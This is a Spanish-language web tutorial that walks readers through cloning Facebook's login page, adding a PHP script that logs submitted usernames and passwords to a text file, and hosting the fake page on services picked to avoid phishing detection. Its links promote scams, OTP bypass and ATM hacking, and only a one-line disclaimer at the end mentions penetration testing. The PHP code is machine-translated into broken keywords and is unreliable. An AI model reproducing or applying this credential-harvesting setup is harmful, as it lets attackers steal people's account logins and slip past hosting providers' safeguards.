Tabla de Contenidos
- Cómo crear un enlace de phishing de Facebook
- Descargar y Guardar el Código Fuente
- LECCIÓN 2
- Modifique el Archivo HTML de la Página para Incorporar Su Archivo PHP en Él.
- Alojar el archivo PHP para Almacenar contraseñas
- Suba Sus Archivos PHP y Cambie el Permiso
- Configurando el post.Foro php
- Conclusión
Cómo crear un enlace de phishing de Facebook
Recientemente he encontrado muchas guías sobre la creación de páginas de phishing. Aunque los principios detrás de cada guía son similares, la mayoría de las soluciones de alojamiento proporcionadas en la guía ya no funcionan debido a un aumento en la represión de las páginas de phishing por parte de las empresas de alojamiento. En esta guía, revisaré todos los pasos necesarios para crear y alojar una página de phishing de su elección. ¡Que lo disfrutes!
Descargue el índice HTML de la página web de destino
Para comenzar, debe obtener el índice HTML de la página. Hay varios métodos para hacer esto, incluso hay plantillas en línea para sitios populares. En este tutorial, voy a usar la forma más básica para ser lo más amigable posible con los novatos.
Lea también: cómo crear un sitio de phishing con kali linux
Vaya a su página web
En este tutorial, voy a hacer phish en Facebook.
Ver la Fuente de la página web.
Dependiendo de su navegador, puede haber diferentes métodos. Normalmente se hace haciendo clic derecho en el sitio y haciendo clic en «Ver fuente». Lo he hecho en mi navegador y una ventana debería salir similar a esta:
En la casilla de la derecha está la fuente del sitio web. Lo que lleva al siguiente paso:
Descargar y Guardar el Código Fuente
Seleccione el cuadro y copie y pegue todo el contenido del cuadro en un documento txt. Utilice el bloc de notas en Windows y un sencillo programa de edición de texto si no está utilizando Windows. (No uses programas como Word o Pages porque es muy lento). Después de que haya hecho eso, haga clic en «Guardar como» o en cualquier opción que le permita guardar ese documento. En el Bloc de notas debería verse así:
Cambie «Guardar como tipo» a Todos los archivos y cambie la codificación a Unicode.
Después de eso, nombra el documento «índice».html», obviamente sin las marcas de voz.
Felicitaciones! De haber terminado el primer paso del tutorial!
Leer también: Cómo hacer una estafa en Facebook sin haber sido baneado o bloqueado
LECCIÓN 2
Crear un archivo PHP para Recolectar contraseñas
El archivo PHP es básicamente la herramienta que recolecta la contraseña de los usuarios en este escenario. Hay varias maneras de crear este PHP si tiene algún conocimiento de programación, pero si no lo tiene, simplemente copie mi ejemplo de PHP.
<?php
cabecera (‘Ubicación: facebook.com’);
$handle = fopen («registro.txt», «a»);
foreach($_POST as $variable => $valor) {
fwrite($handle, $variable);
fwrite($handle, «=»);
fwrite($handle, $valor);
fwrite($handle, «\r\n»);
}
fwrite($handle, «\r\n\n\n\n»);
fclose($handle);
salida;
?>
Al igual que el anterior, guarde el archivo PHP como » Todos los archivos «y como «post».php». Cambie la codificación a Unicode y estará listo para comenzar.
Modifique el Archivo HTML de la Página para Incorporar Su Archivo PHP en Él.
Ahora, necesitamos incorporar nuestro archivo PHP, para recibir las contraseñas que los usuarios envían.
Encuentre el Método de envío de contraseñas
Primero, debe ver cómo funciona el sitio web cuando el usuario envía un nombre de usuario con contraseña.
Para Facebook, todo lo que necesita hacer es Ctrl-F y escribir «=acción» en el campo.
Ahora, debe reemplazar todo en la parte subrayada con «post».php», mantener las marcas de voz. (solo un juego, por favor).
Obviamente, este método será diferente para otros sitios web. Un buen método para encontrarlo es usar la herramienta Inspeccionar elementos en la mayoría de los navegadores modernos y hacer clic en el botón de inicio de sesión. Encuentra algo similar al método anterior.
Lea también: Aprenda a hackear tarjetas de cajero automático, máquinas que usan el software Wizcardo
Tenga en cuenta: Tendrá que cambiar esto más tarde cuando aloje el sitio web.
Alojar el archivo PHP para Almacenar contraseñas
Ahora aquí está la parte jugosa, hacer que su sitio web falso esté en línea para que otras personas puedan explorarlo.
Puede utilizar cualquier servicio de alojamiento gratuito para alojar y almacenar contraseñas. Sin embargo, el plan de alojamiento tiene que incluir algo llamado «FTP». Para este tutorial, usaré 000webhost.
Vaya al Servidor FTP para su Servicio de alojamiento web
Para este paso, asumo que ya ha creado un sitio web con su servicio de alojamiento.
Para 000webhost, simplemente haga clic en» Administrador de archivos «y haga clic en»Cargar archivos». Aquí hay una imagen del servidor FTP para 000webhost:
Ignore los otros archivos, esos son solo algunos de mis asuntos personales, no relacionados con este tutorial.
Suba Sus Archivos PHP y Cambie el Permiso
Como puede ver, ya he subido mi archivo PHP. Pero solo tiene que subirlo a la carpeta principal de su servidor FTP. (Algunos servidores FTP no le permiten cargar en la carpeta raíz, simplemente siga sus instrucciones particulares).
Ahora necesita cambiar el permiso a «777», que es básicamente cada permiso. Cuando se le solicite marcar las casillas para los permisos, simplemente marque todas y cada una de ellas.
Ahora puede cerrar el servidor FTP. Anote su dirección web!
Lea también: Instrucciones de pasos para omitir la Verificación OTP En Cualquier Sitio web
Que aloje la Página de Phishing Real
Para este paso, deberá usar el proveedor de alojamiento exacto que uso, de lo contrario, se le prohibirá.
Hay una razón por la que no uso el mismo proveedor de alojamiento para mi página real, y es porque la mayoría de los proveedores de alojamiento emplearán algún tipo de escaneo para detectar páginas de phishing. Puedo probar múltiples servicios de alojamiento en el pasado y todos ellos me prohibieron dentro de los 30 minutos de cargar el archivo de índice.
Configurando el post.Foro php
Ahora, antes de alojar el sitio web, recuerde la publicación.formulario php / login que configuramos arriba?
Necesitas encontrar el formulario de inicio de sesión de nuevo en tu índice.html y reemplazar el «post.php » con » http://yourwebsiteforyourpostphpupload/post.php», suponiendo que lo haya subido a la carpeta raíz. Recuerde agregar http: / / delante del sitio. Para probar esto, navega al sitio web (http://yourwebsiteforyourpostphpupload/post.php) y mira si te redirige a Facebook.com, si lo hace, entonces ha pegado el sitio correcto. Si no es así, compruebe si ha subido su archivo al directorio correcto.
Alojando la Página Actual
Navegar a htmlpasta.com. Verás algo similar a esto:
Luego, debe copiar el índice.archivo html para su sitio de phishing y péguelo aquí.
Ahora, haga clic en re y haga clic en pegar, obtendrá un enlace para su sitio web.
Conclusión
¡Felicidades! ¡Ha terminado de alojar su primer sitio de phishing! Navegue a su sitio e intente ingresar algunos detalles de inicio de sesión falsos, después de hacer clic en el botón de inicio de sesión, debe redirigirlo a facebook.com. Inicie sesión en el servidor FTP en el que alojó su publicación.archivo php, y debería haber un nuevo documento llamado Log.txt que se almacena en la misma carpeta que tu publicación.archivo php. Cualquier información de inicio de sesión debe almacenarse allí.
Leer también: 2020 yahoo formato de yahoo, formato de facturación, descarga de pdf
Por favor, no utilice esto con fines maliciosos, solo úselo para pruebas de penetración y con la autorización de su víctima.